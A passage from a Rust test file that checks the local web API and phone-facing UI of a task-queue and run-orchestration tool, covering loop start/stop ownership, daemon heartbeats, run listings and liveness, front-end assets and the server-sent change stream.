6800 write_run(&runs, "20260101-000000-doa1", RunStatus::Blocked);
6801 write_run(&runs, "20260101-000000-doa2", RunStatus::Merged);
6805
6806 let mut task = Task::new(
6807 "landed by hand".to_owned(),
6808 "x".to_owned(),
6809 PathBuf::from("/repo/magi"),
6810 Source::Human,
6811 );
6812 task.runs.push("20260101-000000-doa1".to_owned());
6813 task.runs.push("20260101-000000-doa2".to_owned());
6814 queue.put(&mut task).expect("file the task");
6815
6816 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6817 assert_eq!(done.status, 200, "{}", done.body);
6818
6819 let reloaded_run = read_run(&runs, "20260101-000000-doa1")
6820 .expect("run still on disk under this fixture's own home");
6821 assert_eq!(
6822 reloaded_run.status,
6823 RunStatus::Superseded,
6824 "closing the task by hand must relabel the earlier blocked attempt exactly \
6825 like the loop's own settle path does"
6826 );
6827 }
6828
6829 #[tokio::test]
6830 async fn done_from_the_phone_does_not_supersede_when_the_last_attempt_never_landed() {
6831 let f = Fixture::start().await;
6836 let queue = f.queue();
6837 let runs = f.runs();
6838 write_run(&runs, "20260101-000000-dob1", RunStatus::Blocked);
6839 write_run(&runs, "20260101-000000-dob2", RunStatus::Failed);
6840
6841 let mut task = Task::new(
6842 "closed with nothing actually landed".to_owned(),
6843 "x".to_owned(),
6844 PathBuf::from("/repo/magi"),
6845 Source::Human,
6846 );
6847 task.runs.push("20260101-000000-dob1".to_owned());
6848 task.runs.push("20260101-000000-dob2".to_owned());
6849 queue.put(&mut task).expect("file the task");
6850
6851 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6852 assert_eq!(done.status, 200, "{}", done.body);
6853
6854 let reloaded_run = read_run(&runs, "20260101-000000-dob1")
6855 .expect("run still on disk under this fixture's own home");
6856 assert_eq!(
6857 reloaded_run.status,
6858 RunStatus::Blocked,
6859 "the last recorded attempt never landed, so the earlier one must not be \
6860 relabelled as superseded by it"
6861 );
6862 }
6863
6864 #[tokio::test]
6865 async fn unknown_ids_are_json_not_found_on_both_stores() {
6866 let f = Fixture::start().await;
6867
6868 let run = f.get("/api/runs/nosuchrun").await;
6869 let task = f.post("/api/queue/nosuchtask/hold", None).await;
6870
6871 assert_eq!(run.status, 404);
6872 assert_eq!(task.status, 404);
6873 assert!(
6874 run.json()["error"]
6875 .as_str()
6876 .is_some_and(|e| e.contains("run")),
6877 "the error names what was not found: {}",
6878 run.body
6879 );
6880 assert!(
6881 task.json()["error"]
6882 .as_str()
6883 .is_some_and(|e| e.contains("task")),
6884 "the error names what was not found: {}",
6885 task.body
6886 );
6887 }
6888
6889 #[tokio::test]
6890 async fn the_daemon_counts_as_running_only_while_its_heartbeat_is_fresh() {
6891 let f = Fixture::start().await;
6892
6893 let missing = f.get("/api/health").await.json();
6894 assert_eq!(missing["daemon"]["running"], false, "no file, no daemon");
6895
6896 write_daemon(
6897 f.home.path(),
6898 Timestamp::now() - jiff::SignedDuration::from_secs(60),
6899 );
6900 let stale = f.get("/api/health").await.json();
6901 assert_eq!(
6902 stale["daemon"]["running"], false,
6903 "a minute without a heartbeat is a dead daemon, not a busy one"
6904 );
6905 assert!(
6906 stale["daemon"]["stale_for_secs"]
6907 .as_i64()
6908 .is_some_and(|s| s >= 55),
6909 "staleness is reported so the UI can say how long: {stale}"
6910 );
6911
6912 write_daemon(f.home.path(), Timestamp::now());
6913 let fresh = f.get("/api/health").await.json();
6914 assert_eq!(fresh["daemon"]["running"], true);
6915 assert_eq!(fresh["daemon"]["idle"], false);
6916 assert_eq!(fresh["daemon"]["pid"], 4242);
6917 assert_eq!(fresh["daemon"]["completed"], 7);
6918 assert_eq!(
6919 fresh["daemon"]["current"][0]["task"],
6920 "20260902-140501-aaaa"
6921 );
6922 assert_eq!(fresh["version"], env!("CARGO_PKG_VERSION"));
6923 }
6924
6925 #[tokio::test]
6926 async fn the_loop_is_not_running_until_something_starts_it() {
6927 let f = Fixture::start().await;
6928
6929 let view = f.get("/api/loop").await.json();
6930 assert_eq!(view["running"], false);
6931 assert_eq!(
6932 view["owned"], false,
6933 "nobody owns a loop that does not exist: {view}"
6934 );
6935 assert_eq!(view["stopping"], false);
6936 assert_eq!(view["last_error"], Value::Null);
6937 assert_eq!(view["daemon"]["running"], false);
6938 assert_eq!(
6939 view["repo"], "/repo/magi",
6940 "the repository a start would use, named before it is started"
6941 );
6942 }
6943
6944 #[tokio::test]
6945 async fn starting_the_loop_runs_it_in_this_process_and_health_says_the_same() {
6946 let f = Fixture::start().await;
6947
6948 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6949 assert_eq!(res.status, 200, "{}", res.body);
6950 let view = res.json();
6951 assert_eq!(view["running"], true);
6952 assert_eq!(
6953 view["owned"], true,
6954 "the loop the UI started is the UI's own to stop: {view}"
6955 );
6956 assert_eq!(
6957 view["merge"],
6958 Value::Null,
6959 "no override was given, so each repository's own config decides"
6960 );
6961
6962 let health = f.get("/api/health").await.json();
6966 assert_eq!(health["loop"]["running"], true, "{health}");
6967 assert_eq!(health["loop"]["owned"], true, "{health}");
6968
6969 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6970 }
6971
6972 #[tokio::test]
6973 async fn a_second_start_is_refused_rather_than_racing_the_first_for_claims() {
6974 let f = Fixture::start().await;
6975 let first = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6976 assert_eq!(first.status, 200, "{}", first.body);
6977
6978 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6979 assert_eq!(
6980 again.status, 409,
6981 "two loops on one queue race for the same claims: {}",
6982 again.body
6983 );
6984 assert!(
6985 again.json()["error"]
6986 .as_str()
6987 .is_some_and(|e| e.contains("already running the loop")),
6988 "the refusal has to say why: {}",
6989 again.body
6990 );
6991 assert_eq!(
6992 f.get("/api/loop").await.json()["running"],
6993 true,
6994 "and the loop that was already running is untouched by it"
6995 );
6996
6997 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6998 }
6999
7000 #[tokio::test]
7001 async fn stopping_answers_at_once_and_the_loop_settles_stopped() {
7002 let f = Fixture::start().await;
7003 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7004
7005 let res = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7006 assert_eq!(
7007 res.status, 200,
7008 "the answer must not wait for the loop: a run in flight is tens of \
7009 minutes and the operator is holding a phone: {}",
7010 res.body
7011 );
7012
7013 let view = settled(&f, |v| v["running"] == false).await;
7014 assert_eq!(view["owned"], false);
7015 assert_eq!(
7016 view["stopping"], false,
7017 "a loop that has stopped is not still stopping: {view}"
7018 );
7019 assert_eq!(
7020 view["last_error"],
7021 Value::Null,
7022 "a loop that was asked to stop did not fail: {view}"
7023 );
7024
7025 let twice = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7028 assert_eq!(twice.status, 200, "{}", twice.body);
7029 }
7030
7031 #[tokio::test]
7032 async fn a_loop_another_process_owns_can_be_neither_started_nor_stopped_here() {
7033 let f = Fixture::start().await;
7034 write_daemon(f.home.path(), Timestamp::now());
7037
7038 let view = f.get("/api/loop").await.json();
7039 assert_eq!(view["running"], false, "not in this process: {view}");
7040 assert_eq!(view["owned"], false, "and not this process's to control");
7041 assert_eq!(
7042 view["daemon"]["running"], true,
7043 "but a loop is alive somewhere, which is what the UI must say"
7044 );
7045 assert_eq!(view["daemon"]["pid"], 4242);
7046
7047 for body in [r#"{"running":true}"#, r#"{"running":false}"#] {
7048 let res = f.post("/api/loop", Some(body)).await;
7049 assert_eq!(
7050 res.status, 409,
7051 "neither button may pretend to work on someone else's loop: {}",
7052 res.body
7053 );
7054 assert!(
7055 res.json()["error"]
7056 .as_str()
7057 .is_some_and(|e| e.contains("4242")),
7058 "the refusal has to name the process the operator must go to: {}",
7059 res.body
7060 );
7061 }
7062 assert_eq!(
7063 f.get("/api/loop").await.json()["running"],
7064 false,
7065 "and the refusal started nothing"
7066 );
7067 }
7068
7069 #[tokio::test]
7070 async fn a_stale_status_file_is_not_a_foreign_owner() {
7071 let f = Fixture::start().await;
7072 write_daemon(
7073 f.home.path(),
7074 Timestamp::now() - jiff::SignedDuration::from_secs(60),
7075 );
7076
7077 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7078 assert_eq!(
7079 res.status, 200,
7080 "a daemon killed a minute ago must not lock the loop out of its \
7081 own home for good: {}",
7082 res.body
7083 );
7084 assert_eq!(res.json()["running"], true);
7085
7086 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7087 }
7088
7089 #[tokio::test]
7090 async fn loop_rev_moves_on_a_start_so_a_phone_learns_without_polling() {
7091 let f = Fixture::start().await;
7092 let before = f.get("/api/health").await.json()["loop_rev"]
7093 .as_u64()
7094 .expect("a loop revision");
7095
7096 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7097
7098 let after = f.get("/api/health").await.json()["loop_rev"]
7099 .as_u64()
7100 .expect("a loop revision");
7101 assert!(
7102 after > before,
7103 "the loop is in-process state, so this counter is the only thing \
7104 that tells a second device the first one started it: {before} -> \
7105 {after}"
7106 );
7107
7108 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7109 }
7110
7111 #[tokio::test]
7112 async fn a_loop_that_failed_says_why_and_does_not_read_as_running() {
7113 let f = Fixture::with_loop(launch_broken).await;
7114
7115 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7116 assert_eq!(
7117 res.status, 200,
7118 "starting it is not the failure: {}",
7119 res.body
7120 );
7121
7122 let view = settled(&f, |v| v["last_error"].is_string()).await;
7123 assert_eq!(
7124 view["running"], false,
7125 "a loop that died must not read as running, or the operator has \
7126 nothing to press: {view}"
7127 );
7128 assert_eq!(view["owned"], false);
7129 assert!(
7130 view["last_error"]
7131 .as_str()
7132 .is_some_and(|e| e.contains("read-only file system")),
7133 "the phone is where a loop that died at 3am is visible: {view}"
7134 );
7135
7136 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7139 assert_eq!(again.status, 200, "{}", again.body);
7140 assert_eq!(
7141 again.json()["last_error"],
7142 Value::Null,
7143 "a fresh start does not keep showing why the last one died"
7144 );
7145 }
7146
7147 #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
7159 async fn the_deck_answers_while_it_parks_and_frees_the_address_first() {
7160 let home = TempDir::new().expect("temp home");
7161 let runs = home.path().join("runs");
7162 std::fs::create_dir_all(&runs).expect("runs dir");
7163 let ui = Ui::new(
7164 Queue::at(home.path().join("queue")),
7165 Questions::at(home.path().join("questions")),
7166 Talks::at(home.path().join("talks")),
7167 runs,
7168 home.path().to_path_buf(),
7169 PathBuf::from("/repo/magi"),
7170 )
7171 .with_worktrees_root(home.path().join("wt"))
7172 .with_launch(launch_knocking_on_the_way_out);
7173 let looping = ui.looping();
7174 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
7175 .await
7176 .expect("bind loopback");
7177 let addr = listener.local_addr().expect("local addr");
7178 *PARK_KNOCK.lock().expect("park knock") = Some(addr);
7179 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
7180
7181 let started = request(addr, "POST", "/api/loop", Some(r#"{"running":true}"#)).await;
7182 assert_eq!(started.status, 200, "the loop starts: {}", started.body);
7183
7184 let bound = std::sync::Mutex::new(None);
7199 hand_over(home.path(), &looping, served, || {
7200 let deadline = std::time::Instant::now() + std::time::Duration::from_secs(5);
7201 let attempt = loop {
7202 match std::net::TcpListener::bind(addr) {
7203 Ok(l) => {
7204 drop(l);
7205 break Ok(());
7206 }
7207 Err(e)
7208 if e.kind() == std::io::ErrorKind::AddrInUse
7209 && std::time::Instant::now() < deadline =>
7210 {
7211 std::thread::sleep(std::time::Duration::from_millis(10));
7212 }
7213 Err(e) => break Err(e.to_string()),
7214 }
7215 };
7216 *bound.lock().expect("bound") = Some(attempt);
7217 Ok(())
7218 })
7219 .await
7220 .expect("hand over");
7221
7222 assert_eq!(
7223 *PARK_HEARD.lock().expect("park heard"),
7224 Some(200),
7225 "the deck must answer while the loop is parking"
7226 );
7227 let attempt = bound
7228 .lock()
7229 .expect("bound")
7230 .take()
7231 .expect("the successor was started");
7232 assert!(
7233 attempt.is_ok(),
7234 "and the address must be free by the time it is: {attempt:?}"
7235 );
7236 }
7237
7238 #[tokio::test]
7239 async fn a_newer_daemon_status_file_still_renders() {
7240 let f = Fixture::start().await;
7241 std::fs::write(
7244 f.home.path().join("daemon.json"),
7245 serde_json::json!({
7246 "schema": 2,
7247 "updated_at": Timestamp::now().to_string(),
7248 "idle": true,
7249 "surprise": { "nested": [1, 2, 3] },
7250 })
7251 .to_string(),
7252 )
7253 .expect("write daemon.json");
7254
7255 let health = f.get("/api/health").await;
7256
7257 assert_eq!(health.status, 200);
7258 assert_eq!(health.json()["daemon"]["running"], true);
7259 }
7260
7261 #[tokio::test]
7262 async fn a_corrupt_run_is_skipped_in_the_list_and_explained_on_its_own_route() {
7263 let f = Fixture::start().await;
7264 write_run(&f.runs(), "20260902-140501-good", RunStatus::Ready);
7265 let broken = f.runs().join("20260902-140502-bad");
7266 std::fs::create_dir_all(&broken).expect("run dir");
7267 std::fs::write(broken.join("run.json"), "{ truncated").expect("write run.json");
7268
7269 let list = f.get("/api/runs").await;
7270 let detail = f.get("/api/runs/20260902-140502-bad").await;
7271
7272 assert_eq!(list.status, 200);
7273 let listed = list.json();
7274 let ids: Vec<&str> = listed
7275 .as_array()
7276 .expect("an array")
7277 .iter()
7278 .map(|r| r["id"].as_str().expect("an id"))
7279 .collect();
7280 assert_eq!(
7281 ids,
7282 vec!["20260902-140501-good"],
7283 "one unreadable run must not cost the operator the whole history"
7284 );
7285 assert_eq!(detail.status, 500);
7286 assert!(
7287 detail.json()["error"]
7288 .as_str()
7289 .is_some_and(|e| e.contains("run.json")),
7290 "the failure names the file to look at: {}",
7291 detail.body
7292 );
7293 let health = f.get("/api/health").await;
7297 assert_eq!(health.json()["runs_unreadable"], 1);
7298 }
7299
7300 #[tokio::test]
7301 async fn a_run_is_summarised_for_the_list_and_served_whole_on_its_own_route() {
7302 let f = Fixture::start().await;
7303 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Ready);
7304
7305 let summary = f.get("/api/runs").await.json();
7306 let row = &summary[0];
7307 assert_eq!(row["short"], "a1b2");
7308 assert_eq!(row["status"], "ready");
7309 assert_eq!(row["done"], true);
7310 assert_eq!(row["title"], "Add a web UI");
7311 assert_eq!(row["repo_name"], "magi");
7312 assert_eq!(row["judges"], 3);
7313 assert_eq!(row["winner"], Value::Null);
7314 assert_eq!(row["reviews"], 0);
7315
7316 let detail = f.get("/api/runs/a1b2").await;
7319 assert_eq!(detail.status, 200);
7320 assert_eq!(detail.json()["base_branch"], "main");
7321 assert_eq!(detail.json()["id"], "20260902-140501-a1b2");
7322 }
7323
7324 #[tokio::test]
7332 async fn a_mode_none_ready_run_is_flagged_unmerged_by_design_everywhere() {
7333 let f = Fixture::start().await;
7334
7335 let mut none_run = RunState::new(
7336 PathBuf::from("/repo/magi"),
7337 "main".to_owned(),
7338 "0123456789abcdef".to_owned(),
7339 "Add a web UI".to_owned(),
7340 Config::default(),
7341 );
7342 none_run.id = "20260902-140503-none".to_owned();
7343 none_run.status = RunStatus::Ready;
7344 none_run.merge = Some(crate::run::MergeOutcome {
7345 mode: crate::config::MergeMode::None,
7346 ok: true,
7347 detail: "git -C /repo merge --no-ff magi/x/A".to_owned(),
7348 });
7349 write_state(&f.runs(), &none_run);
7350
7351 let mut pr_run = RunState::new(
7352 PathBuf::from("/repo/magi"),
7353 "main".to_owned(),
7354 "0123456789abcdef".to_owned(),
7355 "Add a web UI".to_owned(),
7356 Config::default(),
7357 );
7358 pr_run.id = "20260902-140504-prcl".to_owned();
7359 pr_run.status = RunStatus::Ready;
7360 pr_run.merge = Some(crate::run::MergeOutcome {
7361 mode: crate::config::MergeMode::Pr,
7362 ok: false,
7363 detail: "https://example.com/pr/1 was closed without merging".to_owned(),
7364 });
7365 write_state(&f.runs(), &pr_run);
7366
7367 let summary = f.get("/api/runs").await.json();
7368 let rows: std::collections::HashMap<&str, &Value> = summary
7369 .as_array()
7370 .expect("an array")
7371 .iter()
7372 .map(|r| (r["id"].as_str().expect("an id"), r))
7373 .collect();
7374 assert_eq!(rows[none_run.id.as_str()]["status"], "ready");
7375 assert_eq!(
7376 rows[none_run.id.as_str()]["unmerged_by_design"],
7377 true,
7378 "a mode-none Ready must be flagged in the list"
7379 );
7380 assert_eq!(
7381 rows[pr_run.id.as_str()]["unmerged_by_design"],
7382 false,
7383 "a Ready reached by a closed pull request is a different case"
7384 );
7385
7386 let none_detail = f.get(&format!("/api/runs/{}", none_run.id)).await.json();
7387 assert_eq!(none_detail["status"], "ready");
7388 assert_eq!(none_detail["unmerged_by_design"], true);
7389
7390 let pr_detail = f.get(&format!("/api/runs/{}", pr_run.id)).await.json();
7391 assert_eq!(pr_detail["unmerged_by_design"], false);
7392 }
7393
7394 #[tokio::test]
7399 async fn run_detail_reports_active_seats_and_whether_a_daemon_confirms_them() {
7400 let f = Fixture::start().await;
7401 let id = "20260902-140502-bbbb";
7405 let mut state = RunState::new(
7406 PathBuf::from("/repo/magi"),
7407 "main".to_owned(),
7408 "0123456789abcdef".to_owned(),
7409 "Add a web UI".to_owned(),
7410 Config::default(),
7411 );
7412 state.id = id.to_owned();
7413 state.status = RunStatus::Judging;
7414 state.seat_started("judge", "judge-2", std::time::Duration::from_secs(120), 0);
7415 let dir = f.runs().join(id);
7416 std::fs::create_dir_all(&dir).expect("run dir");
7417 std::fs::write(
7418 dir.join("run.json"),
7419 serde_json::to_string_pretty(&state).expect("serialize run"),
7420 )
7421 .expect("write run.json");
7422
7423 let cold = f.get(&format!("/api/runs/{id}")).await.json();
7429 assert_eq!(cold["active"]["judge-2"]["node"], "judge");
7430 assert_eq!(cold["live"], "unknown", "{cold}");
7431
7432 write_daemon(f.home.path(), Timestamp::now());
7435 let warm = f.get(&format!("/api/runs/{id}")).await.json();
7436 assert_eq!(warm["live"], "live", "{warm}");
7437 }
7438
7439 #[tokio::test]
7446 async fn run_detail_reads_a_manual_run_with_a_live_driver_pid_as_live_without_a_daemon() {
7447 let f = Fixture::start().await;
7448 let id = "20260922-090000-cccc";
7449 let mut state = RunState::new(
7450 PathBuf::from("/repo/magi"),
7451 "main".to_owned(),
7452 "0123456789abcdef".to_owned(),
7453 "Review only".to_owned(),
7454 Config::default(),
7455 );
7456 state.id = id.to_owned();
7457 state.status = RunStatus::Reviewing;
7458 state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7459 state.driver_pid = Some(std::process::id());
7465 state.driver_started_at = Some(
7466 crate::proc::process_started_at(std::process::id())
7467 .expect("this test process's own start time must be queryable"),
7468 );
7469 let dir = f.runs().join(id);
7470 std::fs::create_dir_all(&dir).expect("run dir");
7471 std::fs::write(
7472 dir.join("run.json"),
7473 serde_json::to_string_pretty(&state).expect("serialize run"),
7474 )
7475 .expect("write run.json");
7476
7477 let detail = f.get(&format!("/api/runs/{id}")).await.json();
7478 assert_eq!(detail["live"], "live", "{detail}");
7479 }
7480
7481 #[tokio::test]
7487 async fn run_detail_reads_a_live_pid_as_dead_once_its_start_time_no_longer_matches() {
7488 let f = Fixture::start().await;
7489 let id = "20260922-090100-dddd";
7490 let mut state = RunState::new(
7491 PathBuf::from("/repo/magi"),
7492 "main".to_owned(),
7493 "0123456789abcdef".to_owned(),
7494 "Review only".to_owned(),
7495 Config::default(),
7496 );
7497 state.id = id.to_owned();
7498 state.status = RunStatus::Reviewing;
7499 state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7500 state.driver_pid = Some(std::process::id());
7505 state.driver_started_at = Some("not-this-processes-real-start-time".to_owned());
7506 let dir = f.runs().join(id);
7507 std::fs::create_dir_all(&dir).expect("run dir");
7508 std::fs::write(
7509 dir.join("run.json"),
7510 serde_json::to_string_pretty(&state).expect("serialize run"),
7511 )
7512 .expect("write run.json");
7513
7514 let detail = f.get(&format!("/api/runs/{id}")).await.json();
7515 assert_eq!(detail["live"], "dead", "{detail}");
7516 }
7517
7518 #[test]
7522 fn summarize_asks_about_each_pid_once_and_keeps_the_row_meaning() {
7523 let mk = |id: &str, pid: Option<u32>| {
7524 let mut s = RunState::new(
7525 PathBuf::from("/repo/magi"),
7526 "main".to_owned(),
7527 "0123456789abcdef".to_owned(),
7528 "Add a web UI".to_owned(),
7529 Config::default(),
7530 );
7531 s.id = id.to_owned();
7532 s.driver_pid = pid;
7533 s.driver_started_at = Some("t0".to_owned());
7534 s
7535 };
7536 let states = vec![
7537 mk("20260902-140502-aaaa", Some(77)),
7538 mk("20260902-140502-bbbb", Some(77)),
7539 mk("20260902-140502-cccc", Some(77)),
7540 mk("20260902-140502-dddd", None),
7541 ];
7542 let open: HashSet<String> = ["20260902-140502-bbbb".to_owned()].into();
7543 let claimed: HashSet<String> = ["20260902-140502-dddd".to_owned()].into();
7544 let sup: HashMap<String, String> = [(
7545 "20260902-140502-aaaa".to_owned(),
7546 "20260902-140502-cccc".to_owned(),
7547 )]
7548 .into();
7549
7550 let status_calls = std::cell::Cell::new(0);
7551 let identity_calls = std::cell::Cell::new(0);
7552 let probe = std::cell::RefCell::new(crate::proc::ProcProbe::new(
7553 |_| {
7554 status_calls.set(status_calls.get() + 1);
7555 Some(true)
7556 },
7557 |_| {
7558 identity_calls.set(identity_calls.get() + 1);
7559 Some("t0".to_owned())
7560 },
7561 ));
7562 let rows = summarize(
7563 states,
7564 &open,
7565 &claimed,
7566 &sup,
7567 |p| probe.borrow_mut().status(p),
7568 |p| probe.borrow_mut().started_at(p),
7569 );
7570
7571 assert_eq!(status_calls.get(), 1, "one pid, one status query");
7572 assert_eq!(identity_calls.get(), 1, "one pid, one identity query");
7573 assert_eq!(rows.len(), 4);
7574 assert!(!rows[0].waiting && rows[1].waiting);
7575 assert_eq!(rows[0].live, crate::run::Liveness::Live);
7576 assert_eq!(rows[3].live, crate::run::Liveness::Live, "claim alone");
7577 assert_eq!(rows[0].superseded_by.as_deref(), Some("cccc"));
7578 assert_eq!(rows[1].superseded_by, None);
7579 }
7580
7581 #[test]
7582 fn run_list_exposes_a_confirmed_dead_driver_for_stale_presentation() {
7583 let mut state = RunState::new(
7584 PathBuf::from("/repo/magi"),
7585 "main".to_owned(),
7586 "0123456789abcdef".to_owned(),
7587 "Review only".to_owned(),
7588 Config::default(),
7589 );
7590 state.id = "20260922-090200-dead".to_owned();
7591 state.status = RunStatus::Reviewing;
7592 let row = serde_json::to_value(RunSummary::of(&state, false, crate::run::Liveness::Dead))
7593 .expect("serialize list row");
7594 assert_eq!(row["status"], "reviewing");
7595 assert_eq!(row["live"], "dead", "{row}");
7596 assert!(!row["done"].as_bool().unwrap());
7597 }
7598
7599 #[tokio::test]
7600 async fn the_run_list_is_newest_first_and_honours_a_limit() {
7601 let f = Fixture::start().await;
7602 for id in [
7603 "20260902-140501-aaaa",
7604 "20260902-140502-bbbb",
7605 "20260902-140503-cccc",
7606 ] {
7607 write_run(&f.runs(), id, RunStatus::Merged);
7608 }
7609
7610 let all = f.get("/api/runs").await.json();
7611 let capped = f.get("/api/runs?limit=2").await.json();
7612
7613 assert_eq!(all[0]["id"], "20260902-140503-cccc");
7614 assert_eq!(all.as_array().map(Vec::len), Some(3));
7615 assert_eq!(capped.as_array().map(Vec::len), Some(2));
7616 assert_eq!(capped[0]["id"], "20260902-140503-cccc");
7617 }
7618
7619 #[tokio::test]
7620 async fn the_report_route_serves_the_terminal_report_as_plain_text() {
7621 let f = Fixture::start().await;
7622 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Blocked);
7623
7624 let res = f.get("/api/runs/20260902-140501-a1b2/report").await;
7625
7626 assert_eq!(res.status, 200);
7627 assert!(
7628 res.headers
7629 .contains("content-type: text/plain; charset=utf-8"),
7630 "a browser must render it, not download it: {}",
7631 res.headers
7632 );
7633 assert!(
7637 res.body.contains("20260902-140501-a1b2"),
7638 "the report is about the run that was asked for: {}",
7639 res.body
7640 );
7641 }
7642
7643 #[tokio::test]
7644 async fn the_front_end_is_served_from_the_binary_with_types_a_phone_renders() {
7645 let f = Fixture::start().await;
7646
7647 let html = f.get("/").await;
7648 let css = f.get("/app.css").await;
7649 let js = f.get("/app.js").await;
7650
7651 assert_eq!((html.status, css.status, js.status), (200, 200, 200));
7652 assert!(
7653 html.headers
7654 .contains("content-type: text/html; charset=utf-8")
7655 );
7656 assert!(css.headers.contains("content-type: text/css"));
7657 assert!(js.headers.contains("content-type: text/javascript"));
7658 assert_eq!(html.body, INDEX_HTML, "compiled in, never read from disk");
7659 }
7660
7661 #[test]
7662 fn review_rounds_label_a_distinct_verified_head() {
7663 assert!(APP_JS.contains("round.verified_head"));
7664 assert!(APP_JS.contains("verified HEAD"));
7665 assert!(APP_JS.contains("verified ${String(round.verified_head).slice(0, 7)}"));
7666 }
7667
7668 #[test]
7669 fn queue_ui_presents_blocked_dependencies_and_resolved_questions() {
7670 assert!(APP_JS.contains("blocked: { glyph:"));
7674 assert!(APP_JS.contains("Blocked. Waiting on another task or question to resolve."));
7675
7676 assert!(APP_JS.contains("function classifyBlockedBy(blockedBy, tasksById, questionsById)"));
7680 assert!(
7681 APP_JS.contains(
7682 "if (parts.length) noteText = `${noteText} Waiting on ${parts.join(\" and \")}.`;"
7683 ),
7684 "the note line must name what a blocked task is waiting on, not just that it is blocked"
7685 );
7686 assert!(APP_JS.contains("if (status === \"blocked\") {"));
7690
7691 assert!(APP_JS.contains("function depNode(id, byId, questionNodes)"));
7695 assert!(APP_JS.contains("questionNodes.set(dep, questionsById.get(dep));"));
7696 assert!(
7697 APP_JS.contains("location.hash = \"#/questions\";"),
7698 "a question node must jump to the Questions screen, not pretend to be a task"
7699 );
7700
7701 assert!(APP_JS.contains("Resolved questions"));
7704 assert!(APP_JS.contains("r.answersList.append("));
7705 assert!(APP_CSS.contains(".task-answers"));
7706 }
7707
7708 #[test]
7709 fn a_task_notification_links_to_its_own_card_not_the_bare_backlog() {
7710 assert!(
7715 APP_JS.contains(
7716 "el(\"a\", { href: `#/queue/${encodeURIComponent(link.id)}`, text: `Task ${shortId(link.id)}` })"
7717 ),
7718 "a task notice's link must carry the task id into the hash, not just name the Backlog screen"
7719 );
7720 assert!(
7721 !APP_JS.contains("el(\"a\", { href: \"#/queue\", text: `Task ${shortId(link.id)}` })"),
7722 "regression: the task link must not go back to naming the bare Backlog route"
7723 );
7724
7725 assert!(
7728 APP_JS.contains(
7729 "if (parts[0] === \"queue\" && parts[1]) return { name: \"queue\", id: decodeURIComponent(parts[1]) };"
7730 ),
7731 "`#/queue/<id>` must parse into a route carrying that id"
7732 );
7733
7734 assert!(APP_JS.contains("state.queueFocus = route.id;"));
7738 assert!(APP_JS.contains("function consumeQueueFocus()"));
7739 assert!(APP_JS.contains("jumpToTask(id);"));
7740 }
7741
7742 #[test]
7743 fn consuming_a_queue_focus_survives_clearing_a_stale_backlog_search() {
7744 assert!(
7753 APP_JS.contains(
7754 " if (!id || state.queue === null) return;\n if (state.queueSearch.trim() !== \"\") {"
7755 ),
7756 "the search-clearing branch must run before state.queueFocus is cleared, or the \
7757 recursive renderQueue() call has nothing left to jump to"
7758 );
7759 assert!(
7760 APP_JS.contains("state.queueFocus = null;\n jumpToTask(id);"),
7761 "state.queueFocus must be cleared immediately before the jump it guards, not earlier"
7762 );
7763 }
7764
7765 #[test]
7766 fn a_notification_card_navigates_from_anywhere_on_it_not_just_its_link_text() {
7767 assert!(
7775 APP_JS.contains(
7776 "onclick: link ? (event) => { if (!event.target.closest(\"a, button\")) link.click(); } : null"
7777 ),
7778 "the notice card itself must forward a tap outside its link/buttons to the link's own click"
7779 );
7780 }
7781
7782 #[test]
7783 fn review_rounds_tell_a_stale_verification_and_a_resource_block_apart_from_a_real_result() {
7784 assert!(
7785 APP_JS.contains("round.verified_head !== round.head"),
7786 "a round that verified an earlier commit must be visibly distinct from one that \
7787 verified the head reviewers are looking at now"
7788 );
7789 assert!(
7790 APP_JS.contains("round.verified_at"),
7791 "when a check ran must be on the wire, not just which commit"
7792 );
7793 assert!(
7794 APP_JS.contains("resource_blocked"),
7795 "a command magi never got to run (shared build cache contention) must not render \
7796 the same as a command that ran and failed"
7797 );
7798 }
7799
7800 #[tokio::test]
7801 async fn the_change_stream_announces_the_current_revisions_on_connect() {
7802 let f = Fixture::start().await;
7803
7804 let mut socket = tokio::net::TcpStream::connect(f.addr)
7805 .await
7806 .expect("connect");
7807 socket
7808 .write_all(
7809 b"GET /api/events HTTP/1.1\r\nHost: magi\r\nAccept: text/event-stream\r\n\r\n",
7810 )
7811 .await
7812 .expect("write request");
7813
7814 let mut seen = String::new();
7817 let mut buf = [0u8; 1024];
7818 while !seen.contains("event: change") {
7819 let read = tokio::time::timeout(Duration::from_secs(5), socket.read(&mut buf))
7820 .await
7821 .expect("the stream must speak within five seconds")
7822 .expect("read");
7823 assert!(read > 0, "the server closed the change stream: {seen}");
7824 seen.push_str(&String::from_utf8_lossy(&buf[..read]));
7825 }
7826
7827 assert!(
7828 seen.to_lowercase()
7829 .contains("content-type: text/event-stream"),
7830 "the browser only reconnects automatically for a real SSE stream: {seen}"
7831 );
7832 let data = seen
7833 .lines()
7834 .find_map(|l| l.strip_prefix("data:"))
7835 .expect("a data line");
7836 let payload: Value = serde_json::from_str(data.trim()).expect("json payload");
7837 assert!(
7838 payload["queue_rev"].is_u64()
7839 && payload["runs_rev"].is_u64()
7840 && payload["questions_rev"].is_u64()
7841 && payload["talks_rev"].is_u64()
7842 && payload["notifications_rev"].is_u64()
7843 && payload["loop_rev"].is_u64(),
7844 "the client needs one revision per store to know what to refetch, \
7845 and `talks_rev` is the only notification a standing talk gets - a \
